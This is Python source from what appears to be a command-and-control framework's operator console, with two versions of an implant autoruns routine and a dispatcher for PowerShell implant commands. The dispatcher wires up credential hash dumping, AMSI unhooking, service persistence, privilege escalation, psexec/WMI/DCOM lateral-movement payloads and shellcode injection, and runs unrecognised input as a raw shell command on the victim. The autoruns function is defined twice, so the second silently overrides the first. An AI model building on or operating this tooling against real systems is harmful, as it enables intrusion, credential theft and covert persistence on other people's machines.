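def autoruns(self):
    """Queue this implant's start-up module loads, then replay saved autoruns.

    The Stage2 core to load is chosen by substring-matching ``self.Pivot``;
    a pivot string containing several markers (e.g. both "C#" and "PB") takes
    every matching branch, exactly as before.  All tasks and bookkeeping are
    keyed on ``self.RandomURI``.  Returns None.
    """
    if "C#" in self.Pivot:
        new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
        new_task("loadmodule PwrStatusTracker.dll", "autoruns", self.RandomURI)
        update_mods("Stage2-Core.exe", self.RandomURI)
        update_mods("PwrStatusTracker.dll", self.RandomURI)
        new_task("loadpowerstatus", "autoruns", self.RandomURI)
        update_label("PSM", self.RandomURI)
    if "PS" in self.Pivot:
        new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
        update_mods("Stage2-Core.ps1", self.RandomURI)
    if "PB" in self.Pivot:
        # "PBind Pivot" and plain PBind implants used to be separate branches
        # that did the same two things (their pbind loadmodule tasks had been
        # commented out), so one branch now covers both.  Note: no task is
        # queued here -- the parent is labelled and the core module is only
        # *recorded* as loaded.
        update_label("Parent: %s" % self.IPAddress, self.RandomURI)
        update_mods("Stage2-Core.exe", self.RandomURI)
    if "FC" in self.Pivot:
        update_label("Parent: %s" % self.IPAddress, self.RandomURI)
        new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
        update_mods("Stage2-Core.exe", self.RandomURI)
    # Replay the operator-configured autoruns.  autorun[1] is taken to be the
    # command text -- the row shape comes from get_autoruns(), not visible here.
    for autorun in get_autoruns() or ():
        run_autoloads(autorun[1], self.RandomURI, "autoruns")
        new_task(autorun[1], "autoruns", self.RandomURI)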
def autoruns(self):
    """Queue the start-up core module load for this implant, then its saved autoruns.

    ``self.Pivot`` is substring-matched: "C#" selects Stage2-Core.exe and "PS"
    selects Stage2-Core.ps1 (both may apply).  Saved autoruns come from
    get_autoruns(); the second element of each row is treated as the command.
    Returns None.
    """
    core_modules = (("C#", "Stage2-Core.exe"), ("PS", "Stage2-Core.ps1"))
    for marker, module in core_modules:
        if marker in self.Pivot:
            new_task("loadmodule %s" % module, "autoruns", self.RandomURI)
            update_mods(module, self.RandomURI)
    saved = get_autoruns()
    if not saved:
        return
    for row in saved:
        run_autoloads(row[1], self.RandomURI, "autoruns")
        new_task(row[1], "autoruns", self.RandomURI)
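def handle_ps_command(command, user, randomuri, implant_id):
    """Dispatch one operator command to a PowerShell implant.

    Order of operations: make sure Stage2-Core.ps1 is loaded, expand a leading
    alias from ``ps_alias``, gate commands whose prefix appears in ``ps_opsec``
    behind an interactive confirmation, queue any module autoloads the command
    needs, then route to the matching ``do_*`` handler.  Anything not
    recognised is sent to the implant as a raw shell command via do_shell().

    ``implant_id`` is accepted for interface compatibility but unused here.
    Returns None.
    """
    try:
        check_module_loaded("Stage2-Core.ps1", randomuri, user)
    except Exception as e:
        print_bad("Error loading Stage2-Core.ps1: %s" % e)

    # Alias mapping.  The original called command.replace(...) and discarded
    # the result (str is immutable), so aliases were never applied.  Replace
    # only the matched prefix, and stop at the first alias that matches.
    for alias in ps_alias:
        if command.startswith(alias[0]):
            command = alias[1] + command[len(alias[0]):]
            break
    command = command.strip()

    # OPSEC gate.  Fail closed: the prompt advertises (y/N), so anything other
    # than an explicit "y"/"yes" -- including a bare Enter, "no", or a typo --
    # cancels the command.  (The original only cancelled on "n" or empty.)
    for opsec in ps_opsec:
        if command.startswith(opsec):
            print_bad("**OPSEC Warning**")
            ri = input("Do you want to continue running - %s? (y/N) " % command)
            if ri.strip().lower() not in ("y", "yes"):
                command = ""
            break

    # Nothing left to do once the operator declined (or sent an empty line).
    if not command:
        return

    # Autoloads run only for a command that is actually going to execute, so a
    # declined command does not leave module-load tasks queued on the implant.
    run_autoloads(command, randomuri, user)

    # Exact-match commands.  None of the prefixes below is a prefix of any of
    # these words, so checking them first is equivalent to the original chain.
    exact_handlers = {
        "help": do_help,
        "kill-implant": do_kill_implant,
        "exit": do_kill_implant,
        "listmodules": do_listmodules,
        "modulesloaded": do_modulesloaded,
        "ps": do_ps,
        "hashdump": do_hashdump,
        "stopdaisy": do_stopdaisy,
        "stopsocks": do_stopsocks,
        "sharpsocks": do_sharpsocks,
    }

    # Prefix-match commands, in the ORIGINAL order: first match wins, so the
    # more specific variants must stay ahead of their shorter siblings
    # (e.g. "get-system-withproxy" before "get-system", "loadmoduleforce"
    # before "loadmodule").  Built per call so it does not matter where in the
    # module the do_* handlers are defined.
    prefix_handlers = [
        ("unhook-amsi", do_unhook_amsi),
        ("searchhelp", do_searchhelp),
        ("download-files ", do_download_files),
        ("install-servicelevel-persistencewithproxy", do_install_servicelevel_persistencewithproxy),
        # NOTE(review): the non-proxy variant is routed to the *withproxy*
        # handler, as in the original.  Looks like a copy/paste slip -- confirm
        # the intended handler before changing it.
        ("install-servicelevel-persistence", do_install_servicelevel_persistencewithproxy),
        ("remove-servicelevel-persistence", do_remove_servicelevel_persistence),
        ("get-implantworkingdirectory", do_get_implantworkingdirectory),
        ("get-system-withproxy", do_get_system_withproxy),
        ("get-system-withdaisy", do_get_system_withdaisy),
        ("get-system", do_get_system),
        (("invoke-psexec ", "invoke-smbexec "), do_invoke_psexec),
        ("invoke-psexecproxypayload ", do_invoke_psexecproxypayload),
        ("invoke-psexecdaisypayload ", do_invoke_psexecdaisypayload),
        ("invoke-psexecpayload ", do_invoke_psexecpayload),
        ("invoke-wmiexec ", do_invoke_wmiexec),
        # Command spelling "wmijspbind" vs handler "wmijsbind" is as in the original.
        ("invoke-wmijspbindpayload ", do_invoke_wmijsbindpayload),
        ("invoke-wmijsproxypayload ", do_invoke_wmijsproxypayload),
        ("invoke-wmijsdaisypayload ", do_invoke_wmijsdaisypayload),
        ("invoke-wmijspayload ", do_invoke_wmijspayload),
        ("invoke-wmiproxypayload ", do_invoke_wmiproxypayload),
        ("invoke-wmidaisypayload ", do_invoke_wmidaisypayload),
        ("invoke-wmipayload ", do_invoke_wmipayload),
        ("invoke-dcomproxypayload ", do_invoke_dcomproxypayload),
        ("invoke-dcomdaisypayload ", do_invoke_dcomdaisypayload),
        ("invoke-dcompayload ", do_invoke_dcompayload),
        ("invoke-runas ", do_invoke_runas),
        ("invoke-runasdaisypayload", do_invoke_runasdaisypayload),
        ("invoke-runasproxypayload", do_invoke_runasproxypayload),
        ("invoke-runaspayload", do_invoke_runaspayload),
        ("get-pid", do_get_pid),
        ("upload-file", do_upload_file),
        ("migrate", do_migrate),
        # Handler name keeps the existing "moudle" spelling from elsewhere in the module.
        ("loadmoduleforce", do_loadmoudleforce),
        ("loadmodule", do_loadmodule),
        ("pbind-loadmodule", do_pbind_loadmodule),
        ("invoke-daisychain", do_invoke_daisychain),
        ("inject-shellcode", do_inject_shellcode),
        ("reversedns", do_reversedns),
    ]

    handler = exact_handlers.get(command)
    if handler is None:
        for prefixes, candidate in prefix_handlers:
            if command.startswith(prefixes):
                handler = candidate
                break

    if handler is None:
        # Unrecognised input is executed verbatim on the implant.
        do_shell(user, command, randomuri)
    else:
        handler(user, command, randomuri)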